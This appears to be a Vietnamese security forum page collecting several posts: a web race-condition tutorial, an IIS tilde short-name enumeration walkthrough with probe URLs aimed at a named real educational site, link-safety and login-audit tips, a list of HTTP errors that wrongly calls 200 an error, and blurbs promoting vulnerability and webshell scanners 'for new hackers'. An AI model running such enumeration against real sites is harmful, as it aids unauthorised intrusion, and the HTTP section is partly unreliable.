Trang

[Tutorial] Race condition attack trên ứng dụng web


Race condition là một vấn đề không mới, mình cũng đã biết từ lâu nhưng toàn trên linux. Để hiểu race condition trên web ta xem 1 ví dụ như sau :
Người A có 10000 $ trong tài khoản, anh ta thực hiện rút 5 lần cùng lúc từ internet banking (bỏ qua 1 số token bảo vệ nhé), mỗi lần 10$, nhưng trong tài khoản chỉ trừ 10$ thôi (lẽ ra phải trừ 50). Vậy lỗi xảy ra ở đâu ?
Xem xét đoạn code sau của ngân hàng trong việc trừ tiền :

Khi tiến trình 1 đang thực hiện câu lệnh $tongtien = $tongtien – $sotien thì một tiến trình 2 của người A đang đòi rút chèn ngang, lúc này hệ thống sẽ tạm dừng tiến trình 1 đang xử lý để quay sang xử lý tiến trình 2 :

Lúc này khi bắt đầu xử lý tiến trình 2, tổng tiền chưa được cập nhật bởi tiến trình 1 đã tạm dừng. Do đó số tiền trong tk lúc này vẫn là 10000 và sau khi thực hiện xong cả 2 tiến trình thì tổng tiền vẫn là 9990 mặc dù đã rút 2 lần. Như vậy race condition đã xảy ra khi mà 1 tiến trình chèn ngang tiến trình khác trong lúc các tham số vẫn chưa kịp cập nhật.
Ở đây mình tạo 1 đoạn code lấy tiền với khá nhiều việc, làm cho thời gian xử lý nó lên tới tận 1,2s và cố thử rút 8 lần mà chỉ bị trừ 10$
B1, kiểm tra tài khoản ban đầu và xem access log , lúc này ta đang có 10000:

B2, Xử dụng 1 đoạn python để cùng 1 lúc gửi 8 request, mỗi request đều rút 10$ trong cùng 1 thời gian và xem kết quả trả về :
Như vậy sau 10 request, tổng tiền chỉ bị trừ 10$ trong khi đã rút đến 8 lần.
B3. Kiểm tra log file ta thấy 8 request này tới cùng lúc. Và bởi vì server phải đòi hỏi đến 1 giây để xử lý 1 giao dịch, do đó 8 request này đã làm xuất hiện race condition và bị chèn ngang lẫn nhau.


Nguồn Blog
http://antoanthongtin.wordpress.com

Xem Thêm

 

[TUT] - Khai thác lỗi Microsoft IIS tilde character

Introductions:
Lỗi này xuất hiện trên các máy chủ web Microsoft IIS cho phép Attacker có thể đoán được tên các file hay folder mà bình thường họ không thể thấy được.
Khi bạn upload 1 file trên website, máy chủ web sẽ tạo ra 1 tên ngắn file cho nó.
Ví dụ khi bạn upload file "default.aspx" , máy chủ sẽ tạo ra 1 file có tên ngắn là "defaul~1.asp"

Attack details:
Demo trên site http://hp-aptech.edu.vn

Đầu tiên ta sẽ kiểm tra chữ cái đầu tiên trong tên các file hay folder. Nếu chữ cái đó tồn tại thì sẽ nhận được 1 response 404 - File Not Found. Còn nếu không tồn tại chữ cái đó thì sẽ nhận được 1 response 400 - Bad Request

Bắt đầu thử với link sau:
http://hp-aptech.edu.vn/a*~1*/.aspx -> 404 => Có tồn tại
http://hp-aptech.edu.vn/b*~1*/.aspx -> 404 => Có tồn tại
http://hp-aptech.edu.vn/c*~1*/.aspx- -> 404 => Có tồn tại
………
http://hp-aptech.edu.vn/f*~1*/.aspx ->400 Bad request=> Không tồn tại

Giờ ta sẽ thử với chữ cái thứ 2:
http://hp-aptech.edu.vn/ca*~1*/.aspx -> 400 => Không tồn tại
http://hp-aptech.edu.vn/cb*~1*/.aspx -> 400 => Không tồn tại
http://hp-aptech.edu.vn/cc*~1*/.aspx -> 400 => Không tồn tại
...
http://hp-aptech.edu.vn/co*~1*/.aspx ->404 =>Có tồn tại

Tiếp tục với những chữ cái tiếp theo:
http://hp-aptech.edu.vn/coa*~1*/.aspx -> 400 => Không tồn tại
http://hp-aptech.edu.vn/cob*~1*/.aspx -> 400 => Không tồn tại
...
http://hp-aptech.edu.vn/con*~1*/.aspx -> 404 => Có tồn tại
http://hp-aptech.edu.vn/com*~1*/.aspx -> 404 => Có tồn tại
Cú tiếp tục đoán tiếp nhé
Muốn khai thác thành công kiểu lỗi này phụ thuộc nhiều yếu tố
+Website chạy IIS
+Có khả năng đoán folder,file..-> đoán file thần chưởng
+ Khi mà tìm được folder,file phải có quyền truy cập đến
+Folder,file tìm được có dữ liệu quan trọng
……...
Cụ thể muốn tìm hiểu lỗi này vào đây. Trong đây có tool sẽ giảm thiểu thời gian cho các bạn phải đoán folder,file. Muốn chạy được tool này phải cài java.
http://code.google.com/p/iis-shortname-scanner-poc/

Tut by kakavn_85

Xem Thêm

 

Một số cách kiểm tra độ an toàn của liên kết

Một trong những cách để tránh các mối nguy cơ từ những link dạng này là kiểm tra độ an toàn của nó trước khi click chuột để mở nó. Các liên kết (link) không an toàn xuất hiện ngày càng nhiều trên các trang blog, diễn đàn, mạng xã hội và các trang chia sẻ dữ liệu.

Khả năng ngụy trang của chúng cũng ngày càng trở nên tinh vi hơn. Khi bạn vô tình click vào những link dạng này, bạn có thể sẽ được chuyển đến một trang web chứa virus hoặc mã độc… có thể lây nhiễm vào máy tính và đánh cắp dữ liệu cá nhân của bạn.

Một trong những cách để tránh các mối nguy cơ từ những link dạng này là kiểm tra độ an toàn của nó trước khi click chuột để mở nó. Bài viết sau đây xin giới thiệu đến các bạn một vài cách có thể làm việc này một cách hoàn toàn miễn phí, nhanh chóng và không yêu cầu bạn phải cài đặt thêm bất cứ thứ gì vào máy tính.

1. Xem địa chỉ thực của link ngay trên trình duyệt

Chắc có lẽ bạn đã từng một lần gặp phải một link dạng văn bản liên kết như nhấp vào đây, tải tại đây, download hoặc click here… nhưng khi bấm vào nó thì bạn lại được đưa đến một địa chỉ khác chứ không phải là địa chỉ mà bạn mong muốn. Khi gặp các link thế này, bạn tạm thời đừng click chuột vào nó ngay mà hãy rê chuột lên nó rồi nhìn xuống phía dưới góc trái của trình duyệt web bạn đang sử dụng, địa chỉ thật của nó sẽ hiện ra. Khi đã chắc địa chỉ bạn nhìn thấy là an toàn và đúng là địa chỉ bạn mong muốn thì bạn hãy click vào nó ngược lại thì bạn nên cân nhắc kỹ hoặc tham khảo tiếp các cách sau để kiểm tra độ an toàn của nó.

2. Sử dụng các dịch vụ quét link

Các dịch vụ quét link là những trang web hoặc plug-in cho phép bạn nhập vào địa chỉ URL của một link mà bạn nghi ngờ và kiểm tra độ an toàn của nó. Có rất nhiều dịch vụ miễn phí và đáng tin cậy có thể làm được việc này và URL Void là một trong số đó. URL Voidlà một dịch vụ miễn phí được phát triển bởi công ty NoVirusThanks, nó cho phép bạn phân tích địa chỉ của một website với các bộ máy lưu trữ các tên miền đen (domains blackists) nổi tiếng như Google SafeBrowsing, My Wot, và Norton SafeWeb và nhanh chóng trả về kết quả là độ an toàn của địa chỉ đó.

[Hình: link-an-toan1.jpg]

3. “Soi” địa chỉ thật của link rút gọn

URL Void là một dịch vụ quét link khá tốt. Tuy nhiên nó chỉ có thể quét và kiểm tra địa chỉ URL của link ở dạng đầy đủ, đối với các liên kết dạng rút gọn từ các dịch vụ như bit.ly, ow.ly và tinyurl.com nó thường cho kết quả không chính xác. Đối với những link dạng này, bạn có thể nhờ đến dịch vụ Sucuri.Sucuri sẽ giúp bạn “soi” ra địa chỉ thật của các link rút gọn và sau đó kiểm tra độ an toàn của nó bằng cách bộ máy như Google SafeBrowsing, Norton Safeweb và Phish Tank. Bên cạnh Sucuri, bạn cũng có thể tham khảo một số dịch vụ có khả năng tương tự khác như http://untiny.com, http://urlxray.com...

[Hình: link-an-toan2.jpg]

4. Cách an toàn để sao chép địa chỉ URL của link

Các dịch vụ tương tự như URL Void và Sucuri đều yêu cầu bạn phải nhập (gõ hoặc paste) các địa chỉ URL của link nghi ngờ – nhưng làm thế nào để bạn có thể lấy được một địa chỉ URL của link một cách nhanh chóng và an toàn mà không cần phải mở nó? Rất dễ. Bạn chỉ cần nhấp phải chuột vào link bạn muốn lấy địa chỉ URL rồi chọn Copy Shortcut (đối với IE), Copy Link Location (đối với Firefox) hoặc Copy Link Address (đối với Chrome). Địa chỉ URL sẽ được sao chép vào clipboard ngay sau đó và bạn có thể sử dụng nó để kiểm tra độ an toàn với các dịch vụ trên.

[Hình: link-an-toan3.jpg]

Xem Thêm

 

Cách đơn giản để phát hiện có người sử dụng máy tính của bạn

Có nhiều người sử dụng máy tính không thích đặt mật khẩu cho máy của mình, nhất là khi làm việc ở văn phòng, tuy nhiên điều này cũng gây ra một số rắc rối khi bạn không biết có ai đã sử dụng máy tính của mình lúc đi vắng hay không.


Hoặc giả sử bạn có một đứa em nghịch ngợm hay vài đứa bạn cùng phòng và muốn kiểm tra rằng có ai đã sử dụng máy tính của bạn khi chưa được sự đồng ý. Thật may là Windows và Mac đều có các tính năng giúp bạn kiểm tra những sự đăng nhập trái phép này.

[Hình: Su-dung-1.jpg]

Windows

Trong Windows, bạn có thể kích hoạt tính năng kiểm soát đăng nhập, để nó theo dõi và ghi lại tên tài khoản sử dụng và thời gian mỗi lần đăng nhập vào máy. Để kích hoạt tính năng này, bạn có thể thực hiện theo các bước sau:

[Hình: Su-dung-2.jpg]

Vào Start,"gpedit.msc" trong menu Start và ấn Enter. Sau đó cửa sổ Local Group Policy Editor sẽ hiện ra, trong cây danh sách bên trái, tìm đến Local Computer Policy > Computer Configuration > Windows Settings > Security Settings > Local Policies > Audit Policy.

[Hình: Su-dung-3.jpg]

Trong khung bên phải, kích đúp vào thiết lập Audit logon events, để tùy chỉnh một số thiết lập. Sau khi cửa sổ Audit logon events Properties hiện ra, đánh dấu vào hai lựa chọn Success và Failure, sau đó chọn OK. Lúc này máy tính sẽ kiểm soát và lưu lại tất cả những lần đăng nhập thành công cũng như thất bại (điền sai mật khẩu đăng nhập) vào máy của bạn.

[Hình: Su-dung-4.jpg]

Sau khi đã kích hoạt xong tính năng theo dõi, để có thể xem danh sách thống kê, bạn vào Start gõ vào "Event Viewer" rồi ấn Enter. Cửa sổ Event Viewer sẽ xuất hiện, chọn Windows Logs > Security trong cột bên trái. Hộp thoại Security hiện ra với danh sách các hoạt động trên máy của bạn, bạn sẽ phải để ý đến các hoạt động có Event ID 4624, tương ứng với hoạt động đăng nhập thành công vào máy của bạn.

[Hình: Su-dung-5.jpg]

Bạn có thể kích đúp vào hoạt động đó, để xem thông tin tài khoản đăng nhập, thời gian và một số thông tin khác. Bạn cũng có thể tạo bộ lọc để chỉ hiển thị những hoạt động đăng nhập có Event ID 4624, bằng cách tùy chỉnh trong mục Filter Current Log trên thanh công cụ.

Mac

Trên các máy sử dụng Mac OS, bạn chỉ có thể kiểm tra xem có ai sử dụng máy tính của mình khi bạn rời đi và đang để máy ở chế độ Sleep, nghĩa là nó chỉ lưu lại các hoạt động đánh thức máy tính từ chế độ Sleep. Bạn có thể thực hiện theo các bước sau:

Mở hộp thoại Console bằng cách nhấn Command + Spacebar, hoặc click vào biểu tượng Spotlight và tìm kiếm nó. Gõ từ "wake" vào thanh tìm kiếm, sau đó kéo xuống phần dưới cùng của danh sách, bạn sẽ tìm thấy những hoạt động đăng nhập gần đây nhất.

[Hình: Su-dung-6.jpg]

Một vài thủ thuật đơn giản, nhưng hiểu quả giúp bạn kiểm tra những người sử dụng máy tính của mình khi bạn không ở đó. Việc này khá hữu ích để kiểm soát việc sử dụng máy tính của con cái bạn hoặc các em nhỏ, tuy nhiên trong các trường hợp khác bạn nên đặt một mật khẩu cho máy tính của mình để đảm bảo sự an toàn.

Theo Genk

Xem Thêm

 

Các lỗi HTTP khi truy cập web và cách sửa

Giao thức HTTP viết tắt của cụm từ Hyper Text Transfer Protocol (giao thức truyền siêu văn bản) và nó đã trở thành giao thức mặc định khi bạn sử dụng các trình duyệt để lướt web. Đôi khi bạn gặp các lỗi thông báo khi dùng giao thức HTTP, thường được gọi là HTTP error codes (tạm dịch: mã lỗi HTTP). Mời các bạn theo dõi bài viết để có các nhìn về các mã lỗi này và cách giải quyết.

HTTP Error 500 – Internal Server Error

[Hình: http500error.jpg]

Lỗi này thường do máy chủ nhận thấy có lỗi xảy ra nhưng không thể xác định chính xác lỗi gì và bạn không thể truy cập trang web bị lỗi hoặc tải các tệp tin mà bạn muốn.

Để giải quyết vấn đề này, đầu tiên bạn cần refresh (tạm dịch: "làm tươi") trang web bằng phím F5 hoặc biểu tượng refresh của các trình duyệt. Ở một vài trường hợp thì lỗi này chỉ là lỗi tạm thời và việc refresh trang web có thể giải quyết được. Nếu không được, bạn có thể ghé thăm trang web này sau hoặc báo lại với người quản trị web nếu thấy cần thiết.

HTTP Error 403

Thỉnh thoảng bạn có thể thấy thông điệp HTTP Error 403 – Forbidden, điều này có nghĩa là thông tin hoặc luồng dữ liệu được gửi bởi trình duyệt của máy trạm nhưng máy chủ web từ chối cho truy cập vì một vài lý do.

[Hình: httperror403forbidden.jpg]

Bạn cần kiểm tra lại đường dẫn của website xem đã chính xác chưa, đôi khi thông tin đó được bảo mật bởi người sở hữu website. Bạn có thể gặp thông báo như 401- Not Authorised cũng như thông báo HTTP Error 403 – Forbidden. Cũng có thể lỗi do traqng web bị đóng cửa nên khi bạn truy cập sẽ bị trả về lỗi này.

HTTP Error 503

Có nhiều loại thông báo của lỗi này như “503 Service Temporarily Unavailable” hoặc “503 Service Unavailable”... lỗi này do máy chủ web tạm thời không hoạt động hoặc máy chủ đang bận hoặc đang được bảo trì.

[Hình: httperror503.jpg]

Vấn đề liên quan tới máy chủ nên giải pháp sẽ không có tác dụng từ phía máy trạm, thử refresh lại trang web hoặc báo lại với người quản trị web. Nếu gặp lỗi “Service Unavailable – DNS Failure” có thể modem/Router của bạn có vấn đề, hãy thử khởi động lại chúng.

HTTP Error 400

[Hình: httperror400.jpg]

Khi gặp lỗi “400: Bad Request” hoặc “HTTP Error 400 – Bad Request”, là do yêu cầu gửi từ máy trạm qua trình duyệt web để nạp một trang web nhưng máy chủ web không thể xử lý yêu cầu này.

Giải pháp cho lỗi này gần như không có nhiều ngoài việc kiểm tra lại địa chỉ web hoặc báo lại cho người quản trị để sửa lỗi.

HTTP Error 404

Lỗi chung thường gặp là “HTTP 404 Not Found” , do yêu cầu của máy trạm gửi đến máy chủ khổng thể xử lý giống như lỗi trả về cho người người khi bạn gửi tới một địa chỉ mail bị lỗi từ máy chủ mail.

[Hình: httperror404.jpg]

Có thể máy chủ web không chứa trang web này hoặc các giá trị của DNS (dịch vụ phân giải tên miền) bị lỗi hoặc địa chỉ của trang web này đã bị hỏng. Việc kiểm tra và sửa trang web này cần có sự can thiệp của người quản trị. Ngoài ra, có thể trang web đã được chuyển tới địa chỉ khác nên khi bạn truy cập sẽ gặp lỗi.

HTTP Error 504

[Hình: httperror504.jpg]

Bạn có thể gặp lỗi “HTTP Error 504 – Gateway Timeout” hoặc một vài thông báo tương tự. Lỗi này do máy chủ gặp lỗi khi nhận gói tin phản hồi từ máy chủ xử lý luồng dữ liệu trọng một thời gian nhất định (timeout). Dấu hiệu này cho thấy máy chủ xử lý luồng dữ liệu đang không hoạt động hoặc có thể bị hỏng.

Để giải quyết vấn đề này thì tại máy trạm chỉ có thể refresh hoặc ghé thăm trang web vào dịp khác.

HTTP Error 401

Nếu bạn gặp lỗi "401 Authorization Required" có nghĩa là bạn phải có tài khoản để có thể truy cập vào một trang web nào đó. Nếu bạn không thể truy cập sau khi đã nhập tài khoản thì có nghĩa là bạn gõ sai mật khẩu hoặc tên đăng nhập.

[Hình: httperror401.jpg]

Bạn cần kiểm tra lại địa chỉ xem có sai hay không hoặc nếu trang web không hề yêu cầu đăng nhập để xem thì đây là lỗi từ máy chủ web, bạn nên liên hệ với người quản trị để sửa lỗi này.

HTTP 302

Với lỗi “HTTP Error 302 – Moved temporarily” có nghĩa địa chỉ web đã được di chuyển tạm tới một vị trí khác cũng đồng nghĩa là địa chỉ đã được thay đổi.

[Hình: httperror302.jpg]

Khi địa chỉ web (URL) được chuyển tới vị trí khác thì thông thường webmaster sẽ chuyển hướng nó về địa chỉ mới. Nếu sự chuyển hướng gặp lỗi thì bạn chỉ cần liên hệ webmaster để sửa.

HTTP Error 200

Lỗi này do yêu cầu đã được nhận bởi máy chủ nhưng nó không thể phân phối yêu cầu tới một vài lỗi php trong trang web. Đầu tiên là bạn cần refresh trang web, nếu bộ nhớ của trình duyệt đầy thì bạn có thể gặp lỗi này nên bạn cần dọn sạch bộ nhớ của trình duyệt và kết nối internet lại vì có thể xảy ra lỗi này khi bạn đang sử dụng một kết nối internet chập chờn. Banl có thể rút dây cắm từ modem ra và cắm lại.

[Hình: httperrorcode200.jpg]

Với các thông báo lỗi thường gặp khi bạn sử dụng giao thức HTTP để lướt web phục vụ công việc, học tập ở trên thì các giải pháp đưa ra có thể hữu ích với bạn hoặc những người đang làm quản trị web (webmaster).

Nguồn : CEH

Xem Thêm

 

[Security] Các mức độ cảnh báo An Ninh

Bài này mình giới thiệu các mức độ cảnh báo an ninh, tham khảo dựa trên website của tổ chức phi lợi nhuận Center for Internet Security. Trang chủ: http://www.cisecurity.org.
Link tham khảo: http://msisac.cisecurity.org/alert-level/


Bộ chỉ thị cảnh báo đưa ra mức cảnh báo hiện tại của các hoạt động phá hoại thông qua Internet, chỉ ra những nguy hiểm tiềm ẩn hay có thật. Bộ chỉ thị này có 5 mức.

1.  Mức 1: Low

low

a. Định nghĩa: Mức này chỉ ra cấp độ nguy hiểm thấp. Không có hành động bất thường cần phải quan tâm như những hành động hacking dễ bị phát hiện, những loại virus đã biết, hay những hoạt động phá hoại khác chỉ dừng lại ở mức độ các nguy cơ tiềm ẩn.
b. Mô tả cụ thể:
  • Hoạt động thăm dò, quét hệ thống mạng thông thường.
  • Các loại virus độ nguy hiểm thấp.
c. Hành động xử lí:
  • Tiếp tục các phương pháp bảo vệ thường xuyên bao gồm ứng dụng những security patches của nhà cung cấp và cập nhật antivirus software signature files một cách đều đặn.
  • Tiếp tục giám sát an ninh đều đặn.
  • Đảm bảo nhân viên có được sự đào tạo bài bản về những nguyên tắc an ninh qua Internet.
d. Cảnh báo:
  • Không cần cảnh báo nếu trạng thái vẫn nằm ở mức hiện tại.
  • Thông báo sẽ được thực hiện thông qua website đồng thời với khi mức cảnh báo tăng lên.

2. Mức 2: Guarded

muc 2

a. Định nghĩa: Mức 2 chỉ mức nguy hiểm ở mức độ trung bình của việc hacking, virus xâm nhập tăng hay những hoạt động phá hoại khác. Khả năng tồn tại những hoạt động phá hoại nhưng không có sự exploit đã biết được nhận ra, hoặc những exploit đã biết được nhận ra nhưng không có tác động đáng kể.
Exploit: khai thác lỗi
b. Mô tả cụ thể:
  • Một lỗ hổng nghiêm trọng bị phát hiện nhưng không có sự khai thác.
  • Một lỗ hổng nghiêm trọng bị khai thác nhưng không có tác động đáng kể.
  • Phát hiện loại virus mới với khả năng lan truyền nhanh.
  • Cảnh báo độ đáng tin của việc thăm dò và quét hệ thống mạng.
  • Tấn công đến những hệ thống không quan trọng nhưng không làm mất data.
c. Hành động xử lí:
  • Tiếp tục những hành động đã được đề cập ở mức trước.
  • Nhận diện những hệ thống bị hổng.
  • Bổ sung những Counter-measure (các biện pháp bảo vệ hệ thống) phù hợp để bảo vệ những hệ thống bị hổng.
  • Khi có thể, thực hiện kiểm tra và vá lỗi, thiết lập update anti-virus…trong những lần tiếp sau.
d. Cảnh báo:
  • Thông báo được thực hiện thông qua website ngay khi mức cảnh báo thay đổi.

3. Mức 3: Elevated

muc 3
a. Định nghĩa: Chỉ ra mức nguy hiểm đáng kể do việc hacking, virus hay những hoạt động phá hoại khác tăng lên mà gây hại hệ thống hay làm giảm chất lượng service. Ở mức độ này, có những lổ hỗng đã biết và đang bị khai thác với mức độ phá hủy nhẹ, hay tiềm ẩn nguy cơ gây nguy hiểm cao.
b. Mô tả cụ thể:
  • Một sự khai thác những lỗ hổng nghiêm trọng mà có khả năng gây ra sự hư hỏng đáng kể.
  • Một lổ hổng nghiêm trọng đang bị khai thác và có tác động nhẹ.
  • Gây ảnh hưởng đến an ninh hay các hệ thống quan trọng chứa các thông tin mang tính chất nhạy cảm.
  • Làm hại những hệ thống quan trọng, chứa những thông tin không mang tính chất nhạy cảm.
  • Virus lan truyền nhanh thông qua Internet tác động đến network traffic.
  • Một cuộc tấn công DDoS (Distributes Denial of Service)
c. Hành động xử lí:
  • Tiếp tục những hành động đã đề cập ở mức trước.
  • Nhận diện những hệ thống bị hổng.
  • Tăng cường giám sát các hệ thống quan trọng.
  • Bổ sung ngay những counter-measure phù hợp để bảo vệ những hệ thống quan trọng bị hổng.
  • Khi có thể, thực hiện kiểm tra, đưa vào những bản vá, cài đặt anti-virus updates, …càng sớm càng tốt.
d. Cảnh báo:
  • Cảnh báo được đưa ra thông qua đường email riêng của tổ chức, đơn vị hay điện thoại trực tiếp khi mức cảnh báo được đưa lên mức độ màu vàng (hoặc Elevated).
  • Cảnh báo thông qua website được thực hiện ngay khi mức cảnh báo thay đổi.

4. Mức 4: High

muc 4
a. Định nghĩa: Mức này chỉ ra mức độ nguy hiểm cao của việc hacking, virus, hay các hoạt động phá hoạt thông qua Internet tăng lên, mà chúng nhắm tới hay phá hủy những cấu trúc hạ tầng lõi dẫn đến ngừng dịch vụ, làm hại hệ thống hay làm hại những cấu trúc hạ tầng quan trọng. Ở mức độ này, những lỗ hổng bị khai thác ở mức độ phá hủy cao, hay khả năng cao gây ra mức độ phá hủy nghiêm trọng.
b. Mô tả cụ thể:
  • Một sự khai thác lỗ hổng nghiêm trọng mà có khả năng gây ra sự phá hủy nghiêm trọng.
  • Một lỗ hổng bị khai thác và gây ra tác động đáng kể.
  • Kẻ tấn công đã giành được quyền quản trị trên hệ thống bị xâm nhập.
  • Nhiều virus có khả năng phá hủy tấn công.
  • Nhiều cuộc tấn công DoS chống lại những dịch vụ hạ tầng quan trọng.
c. Hành động xử lí:
  • Tiếp tục những hành động đã được đề cập ở các mức độ trước.
  • Giám sát sít sao các công cụ security bao gồm firewall, web log files, anti-virus gateway, system log files,…cùng với những hành động bất thường.
  • Xem xét giới hạn hay gỡ những kết nối đến những mạng ngoài ít quan trọng như Internet.
  • Xem xét tách những mạng bên trong quan trọng, ít nhiệm vụ, để giới hạn hay giảm khả năng việc bất ngờ xảy ra.
  • Xem xét sử dụng những phương pháp truyền thông thay thế như phone, fax hay radio thay cho email hay những phương pháp truyền thông điện tử khác.
  • Khi có thể, thực hiện kiểm tra, bổ sung những bản vá, cài đặt anti-virus updates,…ngay lập tức.
d. Cảnh báo:
  • Cảnh báo thông qua đường email riêng của tổ chức, đơn vị hay điện thoại trực tiếp khi tổ chức đưa cảnh báo ở màu cam (hay mức high).
  • Cảnh báo qua website ngay khi mức cảnh báo thay đổi.
  • Cảnh báo thông qua đường email riêng sẽ được gởi đến các tổ chức chính và có liên quan khi bất kì mức độ cảnh báo quốc gia hay tổ chức khác nâng lên mức High (hiển thị cảnh báo màu cam).

5.  Mức 5: severe

muc 5

a. Định nghĩa: Mức này chỉ ra mức độ nguy hiểm cực kì của các hoạt động hacking, virus hay các hoạt động phá hoại khác, dẫn đến sự hỏng hóc trên diện rộng và/hoặc sự phá hủy đáng kể đến hệ thống mà không tìm ra phương pháp cứu chữa, hay làm yếu các đoạn cấu trúc hạ tầng quan trọng. Ở mức độ này, lỗ hổng bị khai thác ở mức độ cực kì nghiêm trọng, hay mức độ phá hủy tài sản cấu trúc hạ tầng quan trọng ở diện rộng.
b. Mô tả cụ thể:
  • Sự cố toàn mạng.
  • Sự cố các ứng dụng quan trọng.
  • Làm hại hay mất quyền điều khiển các hệ thống quan trọng.
  • Mất các hệ thống điều khiển giám sát và thu thập dữ liệu (SCADA).
  • Có khả năng hoặc thật sự mất sự tồn tại hay tác động đáng kể đến nền an ninh kinh tế, an ninh chính trị.
c. Hành động xử lí:
  • Tiếp tục những hoạt động đã được đề cập ở các mức trước.
  • Ngắt các kết nối đến Internet và các đối tác kinh doanh bên ngoài cho đến khi các hoạt động sửa lỗi được đưa ra.
  • Tách những mạng bên trong để chặn hay giảm sự hư hại.
  • Sử dụng những phương pháp truyền thông thay thế như phone, fax hay radio thay cho email hay những phương pháp truyền thông điện tử khác.
d. Cảnh báo:
  • Cảnh báo thông qua đường email riêng của tổ chức, đơn vị, thông qua telephone, pager hay fax sẽ được đưa ra khi mức cảnh báo lên màu đỏ (hoặc mức severe).
  • Cảnh báo thông qua website được thực hiện đồng thời với việc thay đổi mức cảnh báo.
  • Cảnh báo thông qua đường email riêng của tổ chức, đơn vị sẽ được gởi đến tổ chức chính và các tổ chức liên quan khi bất kì mức độ cảnh báo quốc gia hay tổ chức khác nâng lên mức Severe (hiển thị cảnh báo màu đỏ).
Tài sản cơ sở hạ tầng quan trọng: (Critical Infracstructure Assets)
Đối với mục đích của quy trình này, tài sản cơ sở hạ tầng quan trọng được định nghĩa như sau: Tài sản cơ sở hạ tầng quan trọng là những tài sản mang tính chất vật lí hay logic rất quan trọng mà sự rò rỉ, mất khả năng, năng lực, sự phá hoại hay lạm dụng của chúng sẽ tác động ảnh hưởng đến sức khỏe, độ an toàn và giảm an ninh kinh tế.

Phần 2: Phương pháp xác định mức cảnh báo:

1. Công thức:

Để tính mức độ cảnh báo an ninh, cần dựa vào các tham số liên quan đến an ninh của hệ thống như khả năng phòng thủ của hệ thống lúc bị tấn công, khả năng phòng thủ và cơ chế chính sách của các thiết bị an ninh mạng lúc hệ thống bị tấn công, khả năng gây nguy hiểm và mức độ tác động của các phương pháp tấn công, … Từ đó đưa ra các mức cảnh báo cho phù hợp, một hệ thống càng an ninh, càng nhiều thiết bị và các lớp an ninh thì càng ít có khả năng bị đưa vào các mức độ cảnh báo an ninh càng cao. Việc xác định mức cảnh báo được thực hiện theo công thức như chỉ dẫn sau:
Severity= (Criticality+Lethality)-(System CounterMeasures+Network CounterMeasures) Trong đó:
  • Severity:  chỉ số quyết định mức độ cảnh báo an ninh được đưa ra.
  • Criticality: mức độ tác động đến hệ thống.
  • Lethality: mức độ xâm nhập vào hệ thống
  • System Counter Measures: những phương pháp bảo vệ trên host hiện có.
  • Network Counter Measures: những phương pháp bảo vệ thuộc network hiện có

2. Xác định các tham số:

a. Criticality: mức độ tác động đến hệ thống.
Giá trị Mức độ tác động
5 Các core service như các router, firewall, VPN, hệ thống IDS, DNS server hay authentication server (như LDAP)
4 E-mail, web, database và các server ứng dụng quan trọng.
3 Các server ứng dụng ít quan trọng
2 Các hệ thống máy tính dùng trong kinh doanh
1 Người dùng tại nhà
b. Lethality: mức độ xâm nhập vào hệ thống  
Giá trị Mức độ xâm nhập:
5
  • Exploit exists
  • Kẻ tấn công giành được quyền quản trị.
  • Kẻ tấn công thực hiện DoS
4
  • Exploit exists
  • Kẻ tấn công giành được quyền truy cập mức độ user.
  • Kẻ tấn công thực hiện DoS
3
  • No known exploit exists
  • Kẻ tấn công giành được quyền quản trị.
  • Kẻ tấn công có thể làm giảm chất lượng dịch vụ
2
  • No known exploit exists
  • Kẻ tấn công giành được quyền truy cập mức độ user.
1
  • No known exploit exists
  • Kẻ tấn công không thể thực hiện truy cập.
  3. System CounterMeasures: những phương pháp bảo vệ trên host hiện có
Giá trị CounterMeasures
5
  • Hệ điều hành đang lưu hành với những bản patch thích hợp được ứng dụng.
  • Server đã được củng cố, chỉnh sửa thông qua scan lỗ hổng.
  • Chạy IDS hay các bộ kiểm tra tích hợp trên host
  • Antivirus signature hiện hành và được ứng dụng ở hệ thống đích
4
  • Hệ điều hành đang lưu hành với những bản patch thích hợp được ứng dụng.
  • Hệ điều hành đã được củng cố.
  • Antivirus signature hiện hành và được ứng dụng ở hệ thống đích
3
  • Hệ điều hành hiện hành với bản patch cập nhật được ứng dụng.
  • Antivirus signature thông dụng
2
  • Hệ điều hành đang lưu hành nhưng thiết vài bản patch phù hợp.
  • Antivirus signature hoặc không tồn tại hoặc không được ứng dụng vào hệ thống đích.
1
  • Các hệ điều hành cũ như Window NT 3.51, Solaris 2.6, Windows 95/98/ME,
  • Không có phần mềm anti-virus bảo vệ.
d. Network CounterMeasures: phương pháp bảo vệ dựa trên network
Giá trị CounterMeasures
5
  • Firewall hạn chế (từ chối tất cả ngoại trừ những gì được cho phép)
  • Các quy định firewall đã được thông qua bởi việc test sự xâm nhập
  • Tất cả các kết nối bên ngoài bao gồm VPNs phải qua firewall
  • IDS dựa trên network được bổ sung.
  • Email gateway thực hiện lọc các đính kèm bởi virus.
4
  • Firewall hạn chế
  • Những kết nối bên ngoài (VPNs, Wireless, Internet, Business partnet…)  được bảo vệ bởi firewire.
  • Email gateway thực hiện lọc các đính kèm bởi virus.
3
  • Firewall hạn chế
  • Email gateway lọc các đính kèm thực thi thông thường.
2
  • Firewall cho phép (vd: cho phép tất cả nhưng…) hay dịch vụ cho phép (HTML, SMTP, …)
  • Email gateway không thực hiện lọc tất cả các đính kèm bởi virus
1
  • Không có firewall
  • Email gateway không lọc bất kì đính kèm nào.

3. Các mức cảnh báo:

Sử dụng công thức đưa ra như trên, bộ chỉ thị cảnh báo được tạo ra ở các mức độ quan trọng như sau
Mức cảnh báo Giá trị tính được
Xanh lá – Low -8 ~ -5
Xanh dương – Gaurded -4 ~ -2
Vàng – Elevated -1 ~ +2
Cam –High +3 ~ +5
Đỏ – Severe +6 ~ +8

Nguồn Blog
http://mcle8.wordpress.com/2013/01/

Xem Thêm

 

Xcode multiple vulnerability Scanner

XCode Exploit – Vulnurable & webshell Scanner help you to gather the dorks Link from Google. then you may check the results if its Vulnurable to exploit with SQL injection commands, LFI,and XSS. And You may hunt the webshells those uploaded.
scansqlinjection
It is highly user friendly,It’s very helpful for new hackers to find multiple vulnerabilities present on different websites.

Xem Thêm

 

CodeXploiter 1.0 - Tìm kiếm các lỗ hổng trong các file PHP

CodeXploiter is a White-Box scanner used for finding vulnerabilities in PHP files. It scans PHP source code files automatically based on selected rules and configurations.
CodeXploiter helps security professionals to highlight possible vulnerabilities in a timely manner by automating the process of source code analysis. As a result this will let security professionals focus more on vulnerability research and exploit development.
CodeXploiter has a user-friendly interface that suits the needs of security professionals and average users who are interested in the field of vulnerability research and exploit development.

